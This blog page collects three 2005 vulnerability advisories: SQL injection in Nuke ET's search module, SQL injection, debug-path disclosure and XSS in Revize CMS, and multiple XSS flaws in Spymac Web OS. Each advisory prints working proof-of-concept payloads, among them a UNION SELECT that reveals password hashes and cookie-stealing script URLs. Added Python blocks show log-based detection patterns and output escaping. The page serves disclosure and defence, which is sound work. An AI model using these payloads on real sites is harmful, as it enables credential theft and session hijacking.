Nuke ET 'search' module 'query' variable SQL injection

Monday, November 21, 2005
###############################################
Nuke ET 'search' module 'query' variable SQL injection
Vendor url: www.truzone.org
exploit available: yes vendor notify: yes
advisory: http://lostmon.blogspot.com/2005/11/nuke-et-search-module-query-variable.html
OSVDB ID: 21002
Secunia: SA17638
BID: 15519
################################################

Nuke ET has a flaw which can be exploited by malicious people to
conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

Nuke ET 3.2
Prior versions may also be affected.

##################
solution:
###################

The vendor has released a fix:

http://www.truzone.org/modules.php?name=DescNuke&d_op=getit&lid=1557

Apply the fix as soon as possible.

####################
Timeline
####################

discovered: 21-11-2005
vendor notify: 21-11-2005
vendor response: 21-11-2005
vendor fix: 21-11-2005
disclosure: 21-11-2005

###################
example:
###################

Go to

http://[Victim]/modules.php?name=Search

and enter the following proof of concept in the search box:

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

All user password hashes become viewable.

#################### €nd ########################

Thanks to estrella for being my light
Thanks to Truzone
Thanks to RiXi
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Revize(r) CMS SQL information disclosure and XSS

Wednesday, November 16, 2005
#######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url: http://www.idetix.com
Advisory: http://lostmon.blogspot.com/2005/11/revizer-cms-sql-information-disclosure.html
Vendor notify:
exploit available: yes
OSVDB ID: 20918,20919,20920,20921,20922
Securitytracker: 1015231
Secunia: SA17623
BID: 15481,15482,15484
#######################################################

The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.

Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

This may allow a remote attacker to execute or manipulate SQL
queries in the backend database.

A remote user can also obtain sensitive data about the target
system by requesting 'revize.xml' in the 'conf' directory
directly. The usual URL for this flaw is:
http://[victim]/revize/conf/

#################
version
#################

Unknown version of Revize(r) CMS.

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?table=rSubjects&apptable&webspace=REVIZE

Admin bypass?

http://[Victim]/revize/debug/

At this URL the page shows a login form, but clicking any link
returns relevant information about the site without logging in.

http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html
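Since no fix was available at the time of this advisory, a defender can at least spot probing of these endpoints in the web server logs. The following is an added example, not part of the advisory or of Revize: it parses constructed Apache combined-format log lines that mirror the request URLs above and flags requests under the /revize/conf/ and /revize/debug/ paths, raw SQL statements in a query parameter, and script markup in any parameter. The log lines, rule names and regular expressions are all my own constructions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines mirroring the advisory's URLs
# (not real traffic). The last line is ordinary traffic and should not fire.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Nov/2005:10:01:02 +0100] "GET /revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Nov/2005:10:01:09 +0100] "GET /revize/conf/revize.xml HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Nov/2005:10:01:15 +0100] "GET /revize/debug/apptables.html HTTP/1.1" 200 880 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Nov/2005:10:02:30 +0100] "GET /revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Nov/2005:10:03:00 +0100] "GET /revize/index.jsp?webspace=REVIZE HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Apache combined log: client, identd, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Rule patterns (constructed for this example; tune before production use).
SQL_RE = re.compile(
    r"\b(select|union|insert|update|delete|drop)\b.*\b(from|into|table|where)\b",
    re.I | re.S,
)
SCRIPT_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)
# Paths the advisory shows as reachable without authentication.
SENSITIVE_PREFIXES = ("/revize/conf/", "/revize/debug/")


def parse_line(line):
    """Split one log line into fields; decode the path and query once."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)
    # parse_qsl already percent-decodes values (a single decode pass).
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of rule names that fire for one parsed request."""
    hits = []
    if rec["path"].startswith(SENSITIVE_PREFIXES):
        hits.append("sensitive-path")
    for name, value in rec["params"]:
        if SQL_RE.search(value):
            hits.append(f"sql-in-param:{name}")
        if SCRIPT_RE.search(value):
            hits.append(f"script-in-param:{name}")
    return hits


def scan(log_text):
    """(ip, path, rules) for every flagged request; clean requests are omitted."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rules = classify(rec)
        if rules:
            findings.append((rec["ip"], rec["path"], rules))
    return findings


if __name__ == "__main__":
    for ip, path, rules in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(rules)}")
```

The path rule is the cheapest signal: on a deployment that does not use the debug console, any hit on /revize/debug/ or /revize/conf/ from outside is worth an alert regardless of what the parameters contain.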

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp


################### €nd ############################

Thanks to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Spymac Web OS v4 blogs and notes multiple variable XSS

Friday, November 04, 2005
#####################################################
Spymac Web OS v4 blogs and notes multiple variable XSS
Vendor url: http://www.spymac.com & http://arnieshwartz.spymac.com/the_spymac_web_os.htm
Advisory: http://lostmon.blogspot.com/2005/11/spymac-web-os-v4-blogs-and-notes.html
Vendor notify: yes exploit available: yes
OSVDB ID: 20902,20903,20904,20905,20906,20907
#####################################################


Spymac is powered by an integrated collection of applications
(developed in-house) that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac has a flaw that allows remote cross-site scripting attacks.
The flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.


################
VERSIONS
################

Spymac Web Os 4.0

#########
Solution
#########

No solution at this time

##########
timeline
##########

Discovered: 28-10-2005
Vendor notify: 02-11-2005
Vendor response:
Disclosure: 04-11-2005


###################
EXAMPLES
###################

To exploit some of these issues, you need to be logged in.

###########
IN BLOGS
###########

http://[Victim]/blogs/index.php?curr=349030[XSS-CODE]

http://[Victim]/blogs/blog_newentry.php?inspire=134403[XSS-CODE]&system=blogentries&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=blogentries[XSS-CODE]&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=blogentries&title=Blogs%20now%20online[XSS-CODE]

http://[Victim]/blogs/blog_newentry_comment.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=113733&caldate=1128146400[XSS-CODE]

http://[Victim]/blogs/blog_edit_entry.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=260&label=Cool%20Stuff&caldate=1128146400[XSS-CODE]

###########
IN NOTES
###########

http://[Victim]/notes/index.php?action=noteform&forwardid=469397[XSS-CODE]
http://[victim]/notes/index.php?action=delete_folder&del_folder=qq[XSS-CODE]
http://[Victim]/notes/index.php?curr=100&isread=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&dateorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&subjectorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100[XSS-CODE]
http://[victim]/notes/index.php?isread=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc&action=search_title[XSS-CODE]
http://[Victim]/notes/index.php?action=shownote&noteid=243633[XSS-CODE]
http://[Victim]/notes/index.php?action=noteform[XSS-CODE]&replyid=243633
http://[Victim]/notes/index.php?action=Inbox[XSS-CODE]
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?totalnotes=[XSS-CODE]&ppp=10&ppp=30
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40&totalreplies=asc[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?action=noteform&touserid=172195[XSS-CODE]
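The cross-site scripting issues in this advisory and in the Revize advisory above share one root cause: a request parameter is reflected into the page without HTML encoding. The following added example (not Spymac or Revize code) decodes the first Revize XSS URL from this page and reflects its resourcetype value into a constructed hidden form field, once verbatim and once HTML-encoded, then parses both results with Python's html.parser to show which one gained a real script element. The form template and the victim.example host are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# First XSS URL from the Revize advisory; "victim.example" stands in for [victim].
ADVISORY_URL = (
    "http://victim.example/revize/HTTPTranslatorServlet?redirect=/revize/"
    "admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3E"
    "alert(document.cookie)%3C/script%3Esecurity&objectmap=subject"
    "&error=admincenter/login.jsp"
)

# Constructed stand-in for the page template that reflects the parameter.
FIELD = '<input type="hidden" name="resourcetype" value="{value}">'


def request_params(url):
    """Decode the query string as the servlet container would (one decode pass)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def render_unsafe(params):
    """Reflect the raw value into the attribute: the advisory's behaviour."""
    return FIELD.format(value=params.get("resourcetype", ""))


def render_escaped(params):
    """Encode for an HTML attribute context: the fix.

    quote=True also encodes the double quote, which is what keeps the value
    inside the attribute instead of letting it close the tag.
    """
    return FIELD.format(value=html.escape(params.get("resourcetype", ""), quote=True))


class TagCollector(HTMLParser):
    """Record every start tag a browser-side parser would create."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    """Return [(tag_name, {attr: value}), ...] for the given markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    p = request_params(ADVISORY_URL)
    print("decoded value:", p["resourcetype"])
    print("unsafe tags:  ", [t for t, _ in parsed_tags(render_unsafe(p))])
    print("escaped tags: ", [t for t, _ in parsed_tags(render_escaped(p))])
```

The escaped rendering still carries the complete original string, recoverable from the parsed attribute value; encoding changes only how the browser tokenises it, not the data itself. The same html.escape() call, applied at every point where a parameter reaches the page, covers each of the Spymac URLs above as well, whatever [XSS-CODE] is replaced with.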

######################## €nd #########################

Thanks to estrella for being my light

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....
 
